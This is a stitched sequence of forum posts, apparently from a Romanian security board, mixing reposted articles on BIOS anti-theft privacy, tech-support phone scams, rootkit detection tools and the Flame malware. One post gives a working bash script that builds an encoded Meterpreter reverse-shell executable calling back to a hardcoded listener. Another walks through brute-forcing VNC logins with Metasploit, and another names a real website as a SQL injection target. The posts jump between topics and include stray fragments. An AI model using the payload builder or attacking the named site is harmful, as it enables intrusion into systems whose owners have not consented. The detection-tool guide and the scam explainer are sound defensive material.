The capabilities of a BIOS rootkit can be seen from an experimental rootkit for desktop computers developed by researchers from Microsoft and the University of Michigan. The rootkit, called SubVirt, can survive hard disk replacement and OS reinstallation. Because it can modify the boot sequence and load itself before the OS, it can operate outside the OS and remain hidden from many anti-virus programs. Moreover, by using hardware virtualization technology from CPU manufacturers, SubVirt is able to load the original OS as a virtual machine and intercept the OS's calls to hardware. It should be remembered that the use of BIOS-embedded rootkits in mobile devices is not a new phenomenon. In October 2008, criminals in Europe inserted rootkits into credit card-reading machines while they were still in the supply chain.
The compromised card-reading devices continued to function like normal credit card readers, except that they copied customers' credit card information and transmitted it to criminals via a cell phone network. The only way to remove the rootkit was to flash (rewrite) the BIOS with a known clean copy, wipe the hard drive, and reload the OS from clean installation media. In relation to the use of anti-theft technologies, a question arises as to whether protection against thieves is worth the high price of weakened information security. In this regard, it should be pointed out that unauthorized access to a computer system can be as disturbing as the theft of a laptop.

5. Solutions

5.1 Solutions to legal problems caused by anti-theft technologies

Pertaining to the legal issues arising from the use of anti-theft technologies, this article recommends four solutions. Firstly, anti-theft technology vendors should guarantee that the application agent is not accidentally activated. This can be done, for instance, by adopting a policy of activating the application agent only after receiving written consent from the user. Secondly, measures should be taken to ensure that machines meant for a customer who ordered a computer with an installed application agent are not resold to a customer who has not agreed to the installation of the agent. Such measures may include additional checks before selling laptops to customers. Thirdly, a user who activated the application agent should be regularly reminded about the presence of the agent. This will give users an opportunity to unsubscribe if the agent was installed accidentally. The dissatisfaction of users with accidentally installed application agents can be seen from the following excerpt of a comment posted in an internet forum: "I have a new laptop, and never paid for a subscription.
I didn’t even know I had their damned spyware installed in my BIOS (or in whatever other piece of hardware it is). I’ve never even been invited to subscribe. Yet my firewall one fine day warned me that rpcnet.exe was trying to access the net. I googled it, and that’s how I know what it is. Don’t believe them if they say it “lies dormant” until activated with a subscription. I personally caught it talking to them. Do not believe them when they say they have deactivated it.”

Fourthly, anti-theft technology vendors should provide users with a way to check whether the application agents are installed on their computers. At present, it is difficult for a layman to establish whether the application agent has been activated.

5.2 Solutions to technological problems caused by the use of anti-theft technologies

Concerning the technological problems related to the use of anti-theft technologies, this article recommends that the producers of BIOS anti-theft technologies put more effort into eliminating the vulnerabilities found by Anibal Sacco and Alfredo Ortega. Instead of responding with press releases that avoid discussing the actual findings of the researchers, it would be better if the anti-theft technology vendors presented technical facts showing that the findings are wrong, patched the problem, or offered updates to fix the issue.

6. Conclusions

According to the statistics, 1 of every 10 laptops is stolen or lost. A Gartner Group report notes that one laptop is stolen every 53 seconds in the United States. BIOS anti-theft technologies make retrieving a lost or stolen laptop possible. All that’s needed is a little luck and the foresight to enable or install the application agent. However, this article has shown that, apart from their benefits, anti-theft technologies have two major drawbacks.
The first drawback is that the privacy rights of users are infringed when the application agent is activated without their consent. The information security vulnerabilities of these technologies constitute the second drawback. These drawbacks have been noticed by both security researchers and laptop users. In the modern era of privacy-conscious societies, it should not come as a surprise that laptop users want to ensure that their personal information will not be shared without their consent and that their machines are as secure as possible.

Source: InfoSec Institute Resources - Legal and Technological Concerns Regarding the Use of BIOS Anti-theft Technologies
  9. This script creates an executable whose payload will try to connect back on 3 different ports, encoded with the shikata_ga_nai encoder. It can of course also be used to create other file types, such as .vba, automatically. You can see the source code of the script below. (Note: msfvenom datastore options are case-sensitive, so EXITFUNC is spelled in uppercase here.)

#!/bin/bash
# Simple multi-port payload builder
LHOST="192.168.91.135"
LPORTS="4444 5555 6666"

rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw

echo "Building..."
echo -n "Port: `echo $LPORTS | cut -d " " -f 1`"
echo ""

# Seed payload for the first port
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=`echo $LPORTS | cut -d " " -f 1` EXITFUNC=thread > /tmp/msf.raw

# Chain a payload for each port onto the previous output (-c)
for LPORT in `echo $LPORTS`
do
    echo -n "Port: $LPORT"
    echo ""
    msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT EXITFUNC=thread -c /tmp/msf.raw > /tmp/msf1.raw
    cp /tmp/msf1.raw /tmp/msf.raw
done

# Change option -f exe to -f vba in order to create a .vba file
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT EXITFUNC=thread -c /tmp/msf1.raw > msf.exe

rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw
echo -n "Done!"

Original Author: Michele
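The port handling in the script relies on cut to pull the first port out of the space-separated LPORTS list, and on a for loop to walk all of them. A quick standalone check of that logic (no msfvenom required):

```shell
LPORTS="4444 5555 6666"

# First port, as used for the initial seed payload:
FIRST=$(echo $LPORTS | cut -d " " -f 1)
echo "$FIRST"   # 4444

# The loop then walks every port (note it revisits 4444 as well,
# so the first port ends up chained twice in the final payload):
for LPORT in $LPORTS; do
    echo "building payload for port $LPORT"
done
```

This also makes the script's one quirk visible: because the loop iterates over the full list, the seed port is generated twice.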
  10. Often in infrastructure penetration tests, especially in large organizations, you might come across the VNC service. This service is usually present because system administrators want to remotely control other systems, or use it for technical support on users' desktops. So when a penetration tester discovers a VNC server running on port 5900, it is good practice to check whether access to the system can be gained through that service by checking for weak passwords. In this tutorial we will see how we can attack a VNC server.

So let's say that we have discovered a VNC service running on port 5900 through our nmap scan.

[VNC Service Discovery]

Now we can use the Metasploit Framework to attack this service. The module that we need is vnc_login. Unfortunately Metasploit doesn't ship a big wordlist for this module, so we might want to use an alternative wordlist to make our attack more effective. So we configure the module and execute it with the run command.

[VNC Authentication Scanner]

As we can see from the image above, the VNC scanner has managed to authenticate with the password admin. Now we can use a VNC viewer to authenticate with the remote host and start the post-exploitation activities.

Conclusion

VNC is a service that can be seen quite often in networks. As we saw, the Metasploit module is simple and effective, and it can be used for testing this service. Of course, Metasploit also offers other modules that can exploit VNC vulnerabilities, but before using those it is advisable to first check with the client for whom the penetration test is being performed.

Source: Penetration Testing Lab
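Since the stock wordlist is small, a custom one can be generated and fed to the vnc_login module. A minimal sketch, with illustrative passwords; PASS_FILE is the standard option name for Metasploit login scanners, and the msfconsole commands are shown as comments only (they are not run here):

```shell
# Build a small custom VNC password list (entries are illustrative).
cat > /tmp/vnc_passwords.txt <<'EOF'
admin
password
vnc
123456
letmein
EOF

grep -c '' /tmp/vnc_passwords.txt   # 5 (line count)

# Then, inside msfconsole:
#   use auxiliary/scanner/vnc/vnc_login
#   set RHOSTS 192.168.1.10
#   set PASS_FILE /tmp/vnc_passwords.txt
#   run
```

A larger list (e.g. from a public wordlist collection) can be substituted the same way; VNC classic authentication only uses the first 8 characters of a password, so very long entries add little.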
  11. I reported them from different email addresses; I didn't know they get merged anyway.
  12. http://www.youtube.com/watch?v=l7lA32UKm3U&feature=g-u-u
  13. In my case, 10 days after I received the notification that the vulnerability was eligible for a reward, I completed the supplier enrollment (with difficulty: the first time Romania was missing from the country list, the second time I got a 500 Internal Server Error). Then I sent an email to p2phelp to ask whether everything was in order. They replied that the SWIFT code was missing. I sent it to a woman named Anita, because the email address they gave me kept throwing errors. She confirmed that everything was OK. Last night I sent her another email asking whether she had any news, since a month and a few days have passed. Now I'm waiting. In the meantime I got another $200 for two XSS bugs; two days ago I completed the supplier enrollment for them too. If those take just as long and come with just as many problems, woe is me.
  14. dafuq? It should work now.
  15. Done. I'm waiting for the solution via PM.
  16. Or not...

Target: http://www.medix.com.hr
Method: Union Based
Requirements: Custom output: user(), database(), version(); nickname, avatar, tables, columns, whatever you want, and a random text;
Proof:

[TABLE=class: grid, width: 800]
[TR]
[TD]Solver:[/TD]
[TD]Syntax:[/TD]
[/TR]
[TR]
[TD]badluck[/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD]ak4d3a[/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD]crossbower[/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD]Praetorian[/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD]denjacker[/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[TR]
[TD][/TD]
[TD]-[/TD]
[/TR]
[/TABLE]

Target taken from a challenge on HF.
  17. ^ With what exactly? Most of the time the problems come down to hardware incompatibilities. Other than that, I don't see what problems you could have. Preferably, have a good look here first: BackTrack 5 Hardware Compatibility List.
  18. “Hi, I’m calling you from Windows Technical Support!”

If you work in IT, or even if you just know computers and the Internet, chances are this line is something you’ve heard before. It’s the opening line of a scam operation that has been underway for many years, mostly out of India, and has managed to get a lot of money from thousands of unsuspecting computer users all around the world. It plays on some very basic fears and uncertainties, and it’s surprisingly effective. Even people whom we would consider smart and intelligent have fallen victim to this type of call. But why are these scam calls so effective, and how do we spot them? And, more importantly, how can you prepare your parents, friends and family, so that if and when they do receive this call, they can quickly identify it as a scam, and know why they shouldn’t trust what these people say? Oftentimes, it’s not enough to just say “Don’t talk to strangers”; you have to be able to explain to them how these people are trying to scam them. So let’s go through the scam to see how it works, and what we can do about it.

The scam

The basic idea behind this type of call is very simple. These companies are based in foreign countries and pay an army of low-salary workers to call random people in the US, Europe, and everywhere else in the developed world. Their goal is to hit someone with a Windows-based computer, and by calling a random number in the west, chances are they will hit a potential target. Then, the script they use is aimed at scaring those people into believing what they say, and then forking over cash. But the way they do it is pretty clever, because they use the person’s own computer as part of the scam, misleading them and scaring them into compliance.
It’s been shown that even people who are aware of phone-based scams, and who start off in a skeptical mindset when the call is initiated, can still be tricked into giving them money, because of how effective their technique is. This is why telling your friends to be wary of tech support calls isn’t enough, especially if those people aren’t computer savvy, which is why it may be a good idea to explain to them exactly what they would see when they receive such a call, and what it all means.

The way the script goes is usually the same. First, the caller tries to convince you that they are some type of authorized support person. This could be a “Windows Technician” or someone from “Microsoft Windows Support”. The key is to include the word Windows, one of the few computer terms that everyone seems to know. Of course, the first clue that this is a scam is the fact that Microsoft doesn’t call you without you having called them before, and that no support technician will contact you about potential problems with your home system, since no one outside your house should have access to your computer in the first place. Unfortunately, this isn’t a very good argument for most people, because they are so used to having support technicians at work who do have access to their systems, and after seeing so many scary hacking-related news bulletins in mainstream media, most people would have no trouble believing someone who tells them that their home computer, the one they bought themselves, is actually communicating with some support firm in another country, one that they have never even heard of.

After convincing you that he or she is indeed a support technician calling to help out, the scammer will painstakingly make you follow a series of steps, all of which are designed to show you that your computer is filled with malware. They basically make you open the Event Viewer, something that comes with every version of Windows, and show you the application log.
There, to the victim’s shock, the display is filled with scary messages, including errors, critical events, and so on. This is the main argument behind most of these scams, and the final nail in the coffin to convince non-savvy computer users that their computer is about to choke under a pile of malware. If someone makes it all the way to this step in the script, then chances are they will be eager for the mysterious caller to give them a solution. This, of course, comes in the form of a useless piece of software that the scammer sells to the victim, sometimes even as a monthly subscription, and the shady business has gained yet another customer.

How to deal with it

Obviously, the best ultimate outcome for this type of shady business is to shut them down, so that they can’t do this to other people. Unfortunately, that’s really hard to do, because these companies can spring up out of nowhere in a matter of days. Just this month the US government was announcing massive lawsuits against some of these very scammers, but as in many other cases, the criminals can restart their operations much faster than the law can close them down. So instead, it’s up to us, IT pros and other savvy Internet users, to make sure these scammers don’t get our families and friends, by educating them. First, we have to understand what the scammers are doing, and then be able to explain why it’s not what it appears to be.

The main point of this scam is to scare the target user by showing them the Event Viewer. The purpose of the Event Viewer is to log everything happening inside a system. This is a tool that server administrators use all the time, and even support technicians, but normal computer users don’t even know about. Because a computer is such a complex piece of electronics, and modern software is so complex, any normal computer is bound to have situations come up where an error, a warning, or even a critical situation may happen, without the end user ever even noticing.
That’s because Windows, like all modern operating systems, is very good at handling errors and recovering from them. If you load the Event Viewer on your own system, you can look through these logs and see the types of errors they contain. Usually, they are drivers that haven’t initialized correctly, or applications that didn’t uninstall completely. They are basically events that should not have occurred, but often don’t impact the overall system much.

First, it’s important not to lie to ourselves: it’s not normal to see so many error messages anywhere on a computer. In an ideal world, these logs would have nothing but information notices, with no errors and no warnings. But we don’t live in a perfect world. Ask yourself, and the person whom you’re trying to convince, how many times they’ve downloaded something, installed a piece of software, or deleted a file. Even if everything seemed to go well on the surface, things may be left over behind the scenes, and that’s where errors come from. But the reason their system didn’t alert them is that it’s something it recovered from. So you shouldn’t be scared into thinking your computer is having major troubles simply because the Event Viewer logged some errors.

But it’s also important not to minimize the importance of the malware threat. People are constantly reminded how important updates are, that everyone should be running antivirus software, and so on. So the right way to convince someone not to fall for these types of scams isn’t to make light of the potential threat, but instead show them how they can be secure for free, without ever paying a dime. You can download the free Microsoft Security Essentials program, or any of the other free security solutions. The important thing to remember is that those scammers all want the exact same thing: money.
So people should always wait before handing over cash, even if they are unsure whether their computer is infected, and instead look for free solutions, because in almost every case a free alternative exists.

Other similar scams

Understanding the Event Viewer, and the fact that every system logs errors that are not an indication the computer is infected or in critical trouble, is the key to defeating this kind of phone-based scam. But there are other scams out there that use similar, slightly different arguments, which people also need to watch out for. It’s unfortunate that this kind of education has to be done for non-techie users, but at the end of the day it’s important to remember just how much of our daily lives is spent in front of a computer, and how dependent we’ve become on them.

One very popular online scam is the fake antivirus. This is a popup you may have come across on some of the shadier sites, or simply on a legitimate web site that happened to have been hacked. The basic idea behind this scam is the same: scare users into thinking their computer is riddled with malware, and get them to hand over cash for “protection”. Of course, the results shown on the screen are complete lies, but the display looks very genuine, and a non-techie user would not know the difference. Here you can’t really argue that the messages aren’t malware notices, so people need other clues to detect these scams. The first thing to tell others is to pay attention to which security software is installed on their system. Whether they use Symantec, Microsoft, or AVG, each product has its own unique look and feel. It’s important that everyone takes the time to look over the various dialogs their security solution can show, and remember what they look like. That way, if some generic “Antivirus 2010” window pops up, they will know right away that it’s a scam. 
Also, be wary of anything that looks out of the ordinary. If a scan suddenly appears on your computer when one shouldn’t be running, then maybe it isn’t what it appears to be. In the end, all of these scams and money-grabbing attempts are pretty easy for us geeks to spot, but the people behind these attacks aren’t targeting us. They go after the much larger population of non-geeks, people who are otherwise intelligent but simply do not understand computers as well as we do, and it’s up to us to educate them, to show them why something isn’t what it claims to be, and how to stay safe without handing money to shady businesses that don’t deserve it. Sursa InfoSec Institute Resources - How to Spot Phone Based Support Scams, and Why They Work So Well
  19. A lot of sniffers, rootkits, botnets, backdoor shells and malware are still in the wild today, used by malicious attackers after successfully pwning a server or live network in order to maintain their access, elevate their privileges, and spy on other users in the network. To protect our network or server from such intrusions and further damage, there are free and open source detection tools that can be deployed as part of our security strategy. They are essential when our server or network is up and running, especially if a user is downloading a file that could be malicious or harmful. The advantage of free and open source detection tools is that you obviously don’t need to pay a single penny, and tutorials are easy to find and understand because manuals are included, usually named README, so be sure to RTFM (Read the F****** Manual). Here are some tools which could be of use to you:

Chkrootkit

Chkrootkit, or Check Rootkit, is a common open source tool for scanning for rootkits, botnets, malware, etc. on your Unix/Linux server or system. It is fully tested on: Linux 2.0.x, 2.2.x, 2.4.x, 2.6.x and 3.x.x; FreeBSD 2.2.x, 3.x, 4.x, 5.x and 7.x; OpenBSD 2.x, 3.x and 4.x; NetBSD 1.6.x; Solaris 2.5.1, 2.6, 8.0 and 9.0; HP-UX 11; Tru64; BSDI; and Mac OS X. This tool is pre-installed in BackTrack 5 under Anti-Virus Forensic Tools. 
To install chkrootkit on an Ubuntu or Debian based distro, you can just type:

sudo apt-get install chkrootkit

To start checking for possible rootkits and backdoors in your system, type the command:

sudo chkrootkit

Here are other options you can use, as shown by the command sudo chkrootkit -h:

-h                 show this help and exit
-V                 show version information and exit
-l                 show available tests and exit
-d                 debug
-q                 quiet mode
-x                 expert mode
-e                 exclude known false positive files/dirs, quoted, space separated, READ WARNING IN README
-r dir             use dir as the root directory
-p dir1:dir2:dirN  path for the external commands used by chkrootkit
-n                 skip NFS mounted dirs

Rootkit Hunter

Rootkit Hunter, or rkhunter, is an open source (GPL) rootkit scanner similar to chkrootkit, and is also pre-installed in BackTrack 5 under Anti-Virus Forensic Tools. This tool scans for rootkits, backdoors and local exploits by running tests such as: MD5 hash comparison, looking for default files used by rootkits, wrong file permissions for binaries, suspicious strings in LKM and KLD modules, hidden files, and optional scans within plaintext and binary files.

To install rkhunter on an Ubuntu or Debian based distro, you can just type:

sudo apt-get install rkhunter

To start scanning your file system, type the command:

sudo rkhunter --check

And if you want to check for updates, issue the command:

sudo rkhunter --update

After rkhunter has finished scanning your file system, all results are logged in /var/log/rkhunter.log. 
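As a quick illustration of the options above, the -q (quiet) flag suits unattended runs, since only suspicious output is printed and cron will then mail it to root. The crontab entry below is a hypothetical sketch; the binary path and schedule are assumptions to adjust for your own system:

```shell
# Hypothetical crontab entry: quiet nightly chkrootkit run at 04:00.
# With -q only suspicious output is printed, so cron mails root
# only when something looks wrong.
0 4 * * * /usr/sbin/chkrootkit -q
```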
Here are other useful options for rkhunter, as shown by the -h flag:

--append-log                  Append to the logfile, do not overwrite
--bindir <directory>...       Use the specified command directories
-C, --config-check            Check the configuration file(s), then exit
--cs2, --color-set2           Use the second color set for output
--configfile <file>           Use the specified configuration file
--cronjob                     Run as a cron job
--dbdir <directory>           Use the specified database directory
--debug                       Debug mode
--disable <test>[,<test>...]  Disable specific tests
--display-logfile             Display the logfile at the end
--enable <test>[,<test>...]   Enable specific tests
--hash {MD5 | SHA1 | SHA224 | SHA256 | SHA384 | SHA512}
                              Use the specified file hash function
--list [tests | languages | rootkits | perl]
                              List the available test names, languages, checked rootkits, or perl module status, then exit
-l, --logfile [file]          Write to a logfile (default is /var/log/rkhunter.log)
--noappend-log                Do not append to the logfile, overwrite it
--nocf                        Do not use the configuration file entries for disabled tests (only valid with --disable)
--nocolors                    Use black and white output
--nolog                       Do not write to a logfile
--nomow, --no-mail-on-warning Do not send a message if warnings occur
--ns, --nosummary             Do not show the summary of check results
--novl, --no-verbose-logging  No verbose logging
--pkgmgr {RPM | DPKG | BSD | SOLARIS | NONE}
                              Use the specified package manager to obtain or verify file property values (default is NONE)
--propupd [file | directory | package]...
                              Update the entire file properties database, or just the specified entries
-q, --quiet                   Quiet mode
--rwo, --report-warnings-only Show only warning messages
-r, --rootdir <directory>     Use the specified root directory
--sk, --skip-keypress         Don't wait for a keypress after each test
--summary                     Show the summary of system check results
--syslog [facility.priority]  Log the check start and finish times to syslog
--tmpdir <directory>          Use the specified temporary directory
--unlock                      Unlock (remove) the lock file
--vl, --verbose-logging       Use verbose logging (on by default)
-V, --version                 Display the version number, then exit
--versioncheck                Check for the latest version of the program
-x, --autox                   Automatically detect if X is in use
-X, --no-autox                Do not automatically detect if X is in use

ClamAV

ClamAV is a well-known open source anti-virus engine for Linux. It is the most famous Linux anti-virus, and it now has a GUI version designed to make detecting trojans, viruses, malware and other malicious threats easier. ClamAV can also be installed on Windows, BSD, Solaris and even Mac OS X. Fellow security researcher Dejan Lukan has a detailed tutorial here on the InfoSec Institute Resources page on how to install ClamAV and how to work with its command line interface.

BotHunter

BotHunter is a network-based botnet diagnosis system which tracks the two-way communication flows between your personal computer and the Internet. It is developed and maintained by the Computer Science Laboratory, SRI International, and is available for Linux and Unix, with a Private Test Release and a Pre-Release now also available for Windows. You can download this software here. You could also check out its addon, BotHunter2Web.pl, which converts BotHunter infection profiles into web pages that can be viewed in your browser directly or via a private web server. BotHunter infection profiles are typically located in ~cta-bh/BotHunter/LIVEPIPE/botHunterResults.txt. 
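The cron-job, update, and report-warnings-only options listed above combine naturally into an unattended nightly check. The crontab entries below are a hypothetical sketch; the binary path and times are assumptions to adjust for your distro:

```shell
# Hypothetical crontab entries: refresh rkhunter's data files at 02:30,
# then run a non-interactive scan at 03:00 that reports warnings only
# and appends to the default logfile.
30 2 * * * /usr/bin/rkhunter --update --nocolors --quiet
0 3 * * *  /usr/bin/rkhunter --cronjob --rwo --append-log
```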
Sample usage for BotHunter2Web.pl:

perl BotHunter2Web.pl [-date YYYY-MM-DD] -i sampleresults.txt

Additional options and switches:

-h                help message
-date YYYY-MM-DD  [or TODAY, YESTERDAY]; blank = build one massive table
-i FILE           BotHunter profile file (e.g., botHunterResults.txt)
-wl <filename>    A list of victim IPs you wish to suppress from the HTML table
-outdir <path>    Output directory (default = current dir)
-MaxEvents N      Max number of event entries per row
-MaxCC N          Max number of CC entries per row
-lookup           Perform nslookup on victim IP

avast! Linux Home Edition

avast! Linux Home Edition is an anti-virus engine offered free of charge, but only for home and not for commercial use. It includes a command line scanner, and based on my experience it detects some of the Perl IRC bots I have been collecting, like w3tw0rk’s modified IRC (Internet Relay Chat) bot (originally made by Pitbul), which contains malicious functions like udpflood and tcpflood and allows its master or bot controller to execute arbitrary commands using Perl’s system() function. You can download this antivirus software here.

NeoPI

NeoPI is a Python script which is useful for detecting obfuscated and encrypted content within text or script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code. The development focus of NeoPI was creating a tool that could be used in conjunction with other established detection methods such as Linux Malware Detect or traditional signature- or keyword-based searches. It is a cross-platform script for Windows and Linux. Not only does it help users detect possible backdoor shells, but also malicious scripts like IRC botnets, udpflood shells, vulnerable scripts, and other malicious content. 
To use this Python script, just check out the code from its official GitHub site and navigate into its directory:

git clone https://github.com/Neohapsis/NeoPI.git
cd NeoPI

Then we use the -h flag to see the options for running the script:

shipcode@projectX:/opt/NeoPI$ sudo ./neopi.py -h
Usage: neopi.py [options] <start directory> <OPTIONAL: filename regex>

Options:
--version             show program's version number and exit
-h, --help            show this help message and exit
-c FILECSV, --csv=FILECSV
                      generate CSV outfile
-a, --all             Run all (useful) tests [Entropy, Longest Word, IC, Signature]
-z, --zlib            Run compression Test
-e, --entropy         Run entropy Test
-E, --eval            Run signature test for the eval
-l, --longestword     Run longest word test
-i, --ic              Run IC test
-s, --signature       Run signature test
-S, --supersignature  Run SUPER-signature test
-A, --auto            Run auto file extension tests
-u, --unicode         Skip over unicode-y/UTF'y files

Based on the options above, if we want to run all tests (Entropy, Longest Word, IC, Signature) plus the auto file extension tests in the /var/www directory, we can just issue the command:

sudo ./neopi.py -a -A /var/www

If we want to generate a CSV outfile for future reference, we can use the command:

sudo ./neopi.py -c outfile.csv -a -A /var/www

Two security researchers (Scott Behrens and Ben Hagen) here at InfoSec Institute, the original developers of the NeoPI project, have also written a detailed tutorial entitled ‘Web Shell Detection Using NeoPI‘ which explains Entropy, Longest Word, IC, Signature and other useful tests.

Ourmon

Ourmon is a Unix-based open source program and a common network packet sniffing tool on FreeBSD, but it can also be used for detecting botnets, as explained by Ashis Dash in his article entitled ‘Botnet detection tool: Ourmon‘ in Clubhack Magazine (Chmag).

Grep

And last but not least, we have the grep command, a powerful command-line tool in Unix and Linux. 
It is used for searching and probing data sets for lines that match a regular expression. As a short history, this utility was written by Ken Thompson on March 3, 1973 for Unix. Nowadays, grep is also handy for detecting and searching for pesky backdoor shells and malicious scripts. Grep can likewise be used for detecting vulnerable scripts (e.g. the PHP function shell_exec, a risky function that allows remote code execution or command execution). We can use the grep command to search for the shell_exec() function in our /var/www directory to check for PHP files that may be vulnerable to RCE or command injection. Here is the command:

grep -Rn "shell_exec *(" /var/www

Backdoor shells commonly use the shell_exec function for executing arbitrary commands. Aside from shell_exec, most PHP backdoor shells also use functions like base64_decode, eval, phpinfo, system, php_uname, chmod, fopen, fclose, readfile, edoced_46esab, and passthru. Thus you can also easily grep for these functions:

grep -Rn "shell_exec *(" /var/www
grep -Rn "base64_decode *(" /var/www
grep -Rn "phpinfo *(" /var/www
grep -Rn "system *(" /var/www
grep -Rn "php_uname *(" /var/www
grep -Rn "chmod *(" /var/www
grep -Rn "fopen *(" /var/www
grep -Rn "fclose *(" /var/www
grep -Rn "readfile *(" /var/www
grep -Rn "edoced_46esab *(" /var/www
grep -Rn "eval *(" /var/www
grep -Rn "passthru *(" /var/www

In my recent research, most Perl IRC botnets use common Perl functions like shell, system, and tcp, so we can grep for these functions just as when hunting PHP backdoor shells. Thus, if we want to scan our /var/www directory again, we can issue the commands below:

grep -Rn "shell *(" /var/www
grep -Rn "tcp *(" /var/www
grep -Rn "system *(" /var/www

Grep is such a good tool for manual detection and forensic analysis. 
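Rather than typing one grep per function, the commands above can be wrapped in a loop. Below is a minimal POSIX-shell sketch; the function name and the shortened function list are illustrative, not an exhaustive signature set:

```shell
# Sketch: recursively grep a web root for risky PHP functions.
# The list here is a small illustrative subset of the one above.
scan_php_backdoors() {
    webroot="$1"
    for fn in shell_exec base64_decode eval system passthru; do
        # -R recurse, -n show line numbers; errors (e.g. missing
        # directories) are suppressed so the loop keeps going
        grep -Rn "$fn *(" "$webroot" 2>/dev/null
    done
}

# Example: scan_php_backdoors /var/www
```

Expect false positives: legitimate code also calls eval and system, so every hit still needs a manual look.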
References:

Linux: Detecting / Checking Rootkits with Chkrootkit and rkhunter Software
https://github.com/Neohapsis/NeoPI
BotHunter2Web Distribution Page
InfoSec Institute Resources – Open Source Antivirus: ClamAV
http://pentestlab.org/hunting-malicious-perl-irc-bots/
The Official ROOTCON Blog: Simple Kung Fu Grep for Finding Common Web Vulnerabilities & Backdoor Shells
InfoSec Institute Resources – Web Shell Detection Using NeoPI

Sursa InfoSec Institute Resources - Free & Open Source Rootkit and Malware Detection Tools
  20. That clearly doesn't mean he hacked Google's servers. To me it sounds more like this: A 24-year-old Romanian hacker has been placed under a general FBI manhunt after NASA complained that an unknown person managed to get past all its security systems and broke several windows, many of them expensive, among them the window Neil Armstrong threw up on when returning from the television studio where he filmed the Moon landing. According to initial reports, the crime was discovered Wednesday morning, shortly after Aurel Onofraș, unemployed by trade, had been seen playing ball dangerously close to the institution's windows. Contacted by phone, Onofraș, who is currently hiding in Râmnicu Vâlcea under the identity of another hacker in the hope of misleading the investigators, confessed to the deed, saying he had been forced to break those windows because they were the only thing at NASA he hadn't yet managed to crack. “I like to think I raised an alarm and sent a fairly strong message: stop fitting cheap double-glazed windows bought on Valea Cascadelor. I hope the people at NASA appreciate my gesture and hire me to fit them some new windows. You know, by trade I'm a glazier; I only crack servers out of boredom. Speaking of which, maybe I wouldn't crack their servers so often if they changed their access password from “forzzasteaua” to something harder to guess, for example “1234”.” Known in hacker circles under the alias “Aurelian Onofraș”, Aurel Onofraș is no stranger to such feats: last year the Vâlcea native managed to break a vase at the Pentagon, a chandelier at the White House, and several glasses at Cotroceni Palace.
  21. It is not possible to talk about cyber warfare and cyber weapons without mentioning the famous Stuxnet virus and the series of state-sponsored malware developed in the same period on a common development platform but with different purposes. Stuxnet is considered the first cyber weapon ever detected, and since then many cyber espionage tools have been used by governments to steal sensitive information and intellectual property from foreign governments, agencies, and enterprises. The first malware developed with this intent by a government appears to have been Duqu, an agent designed by the same authors as Stuxnet and built on the same development framework, named the “Tilded platform”. Last May, the Iranian Computer Emergency Response Team (MAHER) detected a new targeted malware which hit the country. It was named Flame (also known as Flamer or Skywiper) after the name of its main attack module. Within hours, CrySyS Lab and Kaspersky Lab published news about the newly detected malware, which had hit mainly Windows systems in the Middle East, specifically Iran. Coincidence, or a planned communication strategy?

Figure – Flame Source Code

The discovery was made by Iranian scientists during the investigation of the malicious agents Stuxnet and Duqu, and what surprised them was the malware's ability to dynamically change its behavior, including receiving and installing specific modules designed for specific targets. But what really surprised the worldwide security community was Flame's ability to evade all the principal antivirus products for such a long period of time. This very anomalous circumstance fed conjecture that the principal security firms had colluded to avoid detecting the malware, to the advantage of its spread. 
The prompt response of the major security firms, and the certainty that the malware dates back at least to 2010, might suggest that the companies were aware of the Flame project and kept silent by agreement with Western governments. Some months before the discovery of Flame, Western countries had decided to suspend the supply of antivirus systems to Iran as a sanction, forcing the country to develop its own antivirus. How is it possible that the Iranian Computer Emergency Response Team beat the worldwide community and was the first to discover the agent? The malware infected mainly Windows platforms running Windows XP, Vista and Windows 7, gathering information from victims in different ways, such as sniffing network traffic, taking screenshots, recording audio conversations and intercepting keystrokes. Once collected, the information was sent by the agent to the command-and-control servers. Flame is considered a complex piece of malware built with the primary intent of creating a comprehensive cyber espionage toolkit. 
The following list gives some features of the malware, as listed in the official announcement of the MAHER center:

- Distribution via removable media
- Distribution through local networks
- Network sniffing, detecting network resources and collecting lists of vulnerable passwords
- Scanning the disks of infected systems, looking for specific extensions and content
- Creating a series of screen captures when certain specific processes or windows are active
- Using the infected system's attached microphone to record environmental sound
- Transferring saved data to control servers
- Using more than 10 domains as C&C servers
- Establishing secure connections with C&C servers through the SSH and HTTPS protocols
- Bypassing tens of known antivirus, anti-malware and other security products
- Capable of infecting Windows XP, Vista, and 7 operating systems
- Infecting large-scale local networks

The Iranian government maintains that the malware is a new cyber weapon, given its complexity and the propagation methods observed. It did not exclude that a mass data loss incident in Iran was related to an attack by this same malware. The nature of the systems targeted and the geographic distribution of the malware (the Middle East), combined with its high level of sophistication, are, in the opinion of many security experts, clear clues that the malicious software was developed by a foreign state intent on hitting a specific country in that region of the globe. The Kaspersky team defined Flame as a sophisticated attack toolkit which combines the characteristics of a backdoor, a Trojan, and a worm, able to spread itself within a local network and on removable media. 
Figure – Geographic distribution of Flame malware, according to Kaspersky Lab

